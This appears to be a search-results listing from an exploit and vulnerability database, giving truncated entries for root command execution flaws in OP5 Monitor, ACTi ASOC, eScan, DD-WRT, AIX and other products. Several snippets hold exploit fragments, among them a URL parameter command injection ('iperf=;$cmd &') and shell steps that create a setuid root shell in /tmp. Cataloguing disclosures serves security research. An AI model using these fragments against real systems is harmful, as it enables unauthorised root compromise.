632 matches found
OP5 license.php Remote Command Execution
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'OP5 license.php...
OP5 license.php Remote Command Execution
This module exploits an arbitrary root command execution vulnerability in the OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable. This module requires Metasploit: https://metasploit.com/download Current source:...
Dell KACE K2000 Web Backdoor Account
Nessus was able to log into the remote Dell KACE K2000 system using a hidden account. The hidden account, 'kbox1248163264128256', also has administrator privileges. A remote, unauthenticated attacker could exploit this issue to gain administrative access to the K2000 device. After gaining...
ACTi ASOC 2200 Web Configurator <= v2.6 Root Command Execution
Exploit for hardware platform in category remote exploits !perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not...
ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution
ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution !perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not...
ACTi ASOC 2200 Web Configurator 2.6 Remote Root Command Execution
!perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not Vulnerable\n";...
MicroWorld eScan Antivirus Remote Root Command Execution
!/usr/bin/env python import sys from socket import auther: Mohammed almutairi [email protected] """ MicroWorld eScan Antivirus 1 if $POST'forgot' == "Send Password" $user = $POST"uname"; 2 insecure: vulnerable code in forgotpassword.php and commonfunctions.php in 1 $runasroot =...
Microworld eScan AntiVirus < 3.x - Remote Code Execution
!/usr/bin/env python import sys from socket import auther: Mohammed almutairi [email protected] """ MicroWorld eScan Antivirus 1 if $POST'forgot' == "Send Password" $user = $POST"uname"; 2 insecure: vulnerable code in forgotpassword.php and commonfunctions.php in 1 $runasroot =...
FreeBSD ZFS ZIL不安全文件权限漏洞
Bugraq ID: 37657 FreeBSD是一款基于BSD的操作系统。 FreeBSD ZFS存在安全漏洞,本地攻击者可以利用漏洞获得敏感信息或提升特权。 当重播setattr事务时,重播代码默认会以不安全的权限设置属性,当记录这些事务信息时没有再次更改这些属性。 系统崩溃或掉电等情况下会把部分文件以07777属性设置。这可导致获得敏感信息或提升特权。 FreeBSD FreeBSD 8.0-STABLE FreeBSD FreeBSD 8.0-RELEASE FreeBSD FreeBSD 7.2-STABLE FreeBSD FreeBSD 7.1-STABLE FreeBSD...
Multiple XSRF in DD-WRT (Remote Root Command Execution)
Author: Michael Brooks !!!! I usually don't like posting my leet exploits to bugtraq because it is so unprofessional. You guys usually malform my exploits so they are totally useless, even to someone trying to write a patch! You also tend to get the wrong name! Michael Brooks wrote this! Exploits...
DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit
No description provided by source. Remote root dd-wrt -------------------------------------------------------------------------------- Written by Michael Brooks Special thanks to str0ke Exploits tested on the newist stable version: Firmware: DD-WRT v24-sp1 07/27/08 micro Product Homepage:...
CVE-2004-2270
Unknown vulnerability in IBM Parallel Environment PE 3.2 and 4.1 allows attackers to execute arbitrary commands as root via unknown vectors in the sample code...
[Full-disclosure] MA[2005-0712b] - 'Nokia Affix Bluetooth btsrv/btobex poor use of system()'
DMA2005-0712b - 'Nokia Affix Bluetooth btsrv/btobex poor use of system' Author: Kevin Finisterre Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net Product: 'affix' References: http://www.digitalmunition.com/DMA2005-0712b.txt Description: Affix is a Bluetooth Protocol Stack for...
AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution
No description provided by source. mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...
Fedora Core 2 : foomatic-3.0.1-3.1 (2004-303)
Sebastian Krahmer reported a bug in the cupsomatic and foomatic-rip print filters, used by the CUPS print spooler. An attacker who has printing access could send a carefully named file to the print server causing arbitrary commands to be executed as root. The Common Vulnerabilities and Exposures...
CVE-2002-1548
Unknown vulnerability in autofs on AIX 4.3.0, when using executable maps, allows attackers to execute arbitrary commands as root, possibly related to "string handling around how the executable map is called."...
CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)
CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link 2 source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. When CDRDAO saves...
sonata-teleconf-2.txt
Here you go alan! -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vulnerability Report 2 For Voyant Technologies Sonata Conferencing product. Larry W. Cashdollar Vapid Labs Date Published: 12/18/2000 Advisory ID: 12182000-02 CVE CAN: None currently assigned. Title: Sonata doroot command...
БОльшая дырка в Aptis Totalbill
Демон на одном из портов позволяет выполнять любые команды с привилегией root без авторизации...
gdm 1.0.x2.0.x BETA2.2.0 - XDMCP Buffer Overflow (2)
gdm 1.0.x2.0.x BETA2.2.0 - XDMCP Buffer Overflow 2 // source: https://www.securityfocus.com/bid/1233/info A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for ...